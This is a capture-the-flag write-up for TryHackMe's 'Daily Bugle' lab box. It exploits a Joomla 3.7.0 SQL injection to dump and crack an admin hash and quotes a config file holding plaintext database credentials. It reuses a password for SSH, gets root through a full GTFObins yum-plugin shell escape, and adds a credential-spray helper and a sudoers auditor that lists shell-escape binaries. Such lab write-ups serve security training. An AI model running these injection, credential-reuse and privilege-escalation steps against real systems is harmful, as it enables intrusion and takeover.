Daily Bugle
A hard Linux box from TryHackMe: exploit a SQL injection in the installed Joomla version to dump the admin's password hash, crack it, reuse a password found in the Joomla config to pivot to a local user, and finally abuse a sudo rule for yum (straight from GTFObins) to get root.
Recon
Starting with the default nmap scan
sudo nmap -sC -sV -oA nmap/dailybugle 10.10.78.145
Nmap scan report for 10.10.78.145
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
Only the web server is interesting here. The default scripts even pulled /joomla/administrator/ out of robots.txt, so the site is most likely running Joomla.
Running joomscan against the server confirms it: Joomla 3.7.0
joomscan -u 10.10.78.145
...
[+] Detecting Joomla Version
[++] Joomla 3.7.0
...
A quick searchsploit on that version turns up a SQL injection in one of its components (com_fields), sweet
searchsploit joomla 3.7.0
---------------------------------------------------------------------------------- -----------------------
Exploit Title | Path
---------------------------------------------------------------------------------- -----------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt
---------------------------------------------------------------------------------- -----------------------
Exploitation
Searching Google and GitHub for a working exploit turns up joomblah, a Python script that, given the site URL, abuses the com_fields injection and dumps the users table from the database
Running the script with
python exploit.py http://10.10.78.145
The dump gives the Joomla users table: a Super User account named jonah, the email jonah@tryhackme.com, and a bcrypt ($2y$) password hash
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: fb9j5_users
- Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
Cracking it with john and rockyou
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash.txt --format=bcrypt
And find the password to be “spiderman123”
That gives a complete set of creds, jonah:spiderman123, which work for the Joomla admin panel but not for SSH
Looking through the site's configuration file (Joomla's configuration.php), though, turns up another set of creds, this time for the database
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $dbprefix = 'fb9j5_';
public $live_site = '';
public $secret = 'UAMBRWzHO3oFPmVC';
public $gzip = '0';
public $error_reporting = 'default';
public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
public $ftp_host = '127.0.0.1';
public $ftp_port = '21';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
The database password "nv5uz9r3ZEDzVjNu" doesn't work for root over SSH, but it does work for the jjameson user: the same password was reused for a local account, and that is the foothold!
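The pivot above is plain password reuse between a web application's config and a local account, so as an added example (not from the writeup) here is a small Python parser for the configuration.php format shown above. It pulls every `public $x = '...';` assignment, handles PHP single-quoted escaping, lists the secret-bearing keys that are set, and builds the (user, password) pairs worth trying against SSH. The config text is the fragment quoted above; the jjameson username is passed in as the local user learned from the box, and the key list is my own (smtppass is another credential field Joomla's config carries).

```python
import re

# The Joomla configuration.php fragment quoted above, embedded as sample input.
CONFIG_PHP = """\
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $dbprefix = 'fb9j5_';
public $secret = 'UAMBRWzHO3oFPmVC';
public $ftp_user = '';
public $ftp_pass = '';
"""

# public $name = 'value';  -- PHP single-quoted strings only treat \' and \\ as escapes.
ASSIGN_RE = re.compile(r"public\s+\$(\w+)\s*=\s*'((?:\\.|[^'\\])*)'\s*;")
# Config keys in a Joomla install that hold credentials worth testing for reuse.
SECRET_KEYS = ("password", "secret", "ftp_pass", "smtppass")


def php_unescape(raw):
    """Undo PHP single-quote escaping: \\' -> ' and \\\\ -> \\ ; other backslashes stay literal."""
    return re.sub(r"\\(['\\])", r"\1", raw)


def parse_joomla_config(text):
    """Map every 'public $x = '...';' line to {x: value}."""
    return {key: php_unescape(val) for key, val in ASSIGN_RE.findall(text)}


def extract_secrets(cfg):
    """Non-empty secret-bearing values, keyed by config name (empty ftp_pass etc. are dropped)."""
    return {key: cfg[key] for key in SECRET_KEYS if cfg.get(key)}


def config_findings(cfg):
    """Hardening issues visible from the config alone."""
    issues = []
    if cfg.get("user") == "root":
        issues.append("web application connects to MySQL as root")
    if cfg.get("ftp_pass"):
        issues.append("FTP layer enabled with a stored password")
    return issues


def reuse_candidates(cfg, local_users):
    """(user, password) pairs to try over SSH: the DB user plus each known local user, with every secret."""
    users = [cfg.get("user", "")] + list(local_users)
    secrets = list(extract_secrets(cfg).values())
    return [(u, s) for u in users if u for s in secrets]


if __name__ == "__main__":
    cfg = parse_joomla_config(CONFIG_PHP)
    print(extract_secrets(cfg))
    print(config_findings(cfg))
    for user, pw in reuse_candidates(cfg, ["jjameson"]):
        print(f"try {user}:{pw}")
```

Running it against the fragment yields the DB password and the Joomla secret as the two live credentials, flags that the site talks to MySQL as root, and lists root and jjameson paired with both values as the spray set, which is exactly the combination that worked on this box.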
Going through the usual privesc motions, sudo -l shows that jjameson can run yum as root
sudo -l
/bin/yum
Yum is a package manager, but it loads Python plugins from whatever directory its config file names, and under sudo we get to choose that config file. GTFObins gives the recipe: write a minimal yum config that points both plugin paths at a temp dir we own, drop in a plugin whose init_hook execs /bin/sh, and run yum with that config. Four steps:
TF=$(mktemp -d)
# Minimal yum config: enable plugins and point both plugin paths at our temp dir
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
# Plugin config; the file name (y.conf) is the plugin name passed to --enableplugin
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
# The plugin itself: yum calls init_hook during startup, which under sudo runs as root
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF
# Run yum with our config; the plugin fires before any package work happens
sudo yum -c $TF/x --enableplugin=y
And get root!
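The root cause here is a sudo rule that grants a GTFObins-listed binary with no argument restriction. As an added example (not part of the writeup), this Python script parses sudoers user-spec lines and flags exactly that pattern. The sample sudoers content is constructed: the jjameson line mirrors what sudo -l showed above, the other lines are made up to exercise the parser, and the binary list is a deliberately small subset of GTFObins' sudo entries that I wrote from memory, not the full list.

```python
import re
import shlex

# Constructed sudoers lines (not from the box); the jjameson rule mirrors the
# sudo -l result above, the rest are made up to exercise the parser.
SAMPLE_SUDOERS = """\
Defaults    env_reset
root     ALL=(ALL)       ALL
%wheel   ALL=(ALL)       ALL
jjameson ALL=(ALL) NOPASSWD: /bin/yum
deploy   ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service, /usr/bin/journalctl -u app.service
backup   ALL=(root) /usr/bin/rsync, /bin/yum update
"""

# Deliberately small subset of binaries GTFOBins lists under "sudo" as giving a
# root shell when they can be run with arbitrary arguments.
SHELL_ESCAPE_BINS = {"yum", "vim", "vi", "less", "more", "find", "awk", "env",
                     "python", "python3", "perl", "bash", "sh", "tar", "zip"}

# user  hosts = (runas) [TAG:] cmd [args], cmd [args], ...
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(r"^(?:NO)?(?:PASSWD|EXEC|SETENV|LOG_INPUT|LOG_OUTPUT):\s*")


def parse_rule(line):
    """Parse one user-spec line into (user, runas, [(tags, path, args), ...]); None if not a rule."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    cmds, tags = [], set()
    for raw in m.group("cmds").split(","):
        raw = raw.strip()
        while (t := TAG_RE.match(raw)):  # a tag applies to this and all later commands in the list
            tags.add(t.group(0).rstrip(": \t"))
            raw = raw[t.end():]
        parts = shlex.split(raw)
        cmds.append((frozenset(tags), parts[0], parts[1:]))
    return m.group("user"), (m.group("runas") or "root").strip(), cmds


def audit(text):
    """(user, command, reason) for every rule that lets a non-root principal become root."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        parsed = parse_rule(line)
        if parsed is None or parsed[0] == "root":
            continue
        user, runas, cmds = parsed
        runas_users = [r.strip() for r in runas.split(":")[0].split(",")]  # drop the :group part
        if "ALL" not in runas_users and "root" not in runas_users:
            continue  # this rule cannot run anything as root
        for _tags, path, args in cmds:
            if path == "ALL":
                findings.append((user, "ALL", "any command as root"))
            elif path.rsplit("/", 1)[-1] in SHELL_ESCAPE_BINS and not args:
                findings.append((user, path, "GTFOBins shell escape, arguments unrestricted"))
    return findings


if __name__ == "__main__":
    for user, cmd, reason in audit(SAMPLE_SUDOERS):
        print(f"{user}: {cmd} -> {reason}")
```

The backup line in the sample shows the fix: `/bin/yum update` pins the argument list, so `-c $TF/x --enableplugin=y` no longer matches the rule and yum falls back to its root-owned default plugin directory. The script treats that as clean, while the jjameson rule (bare /bin/yum) and the %wheel rule (ALL) are reported.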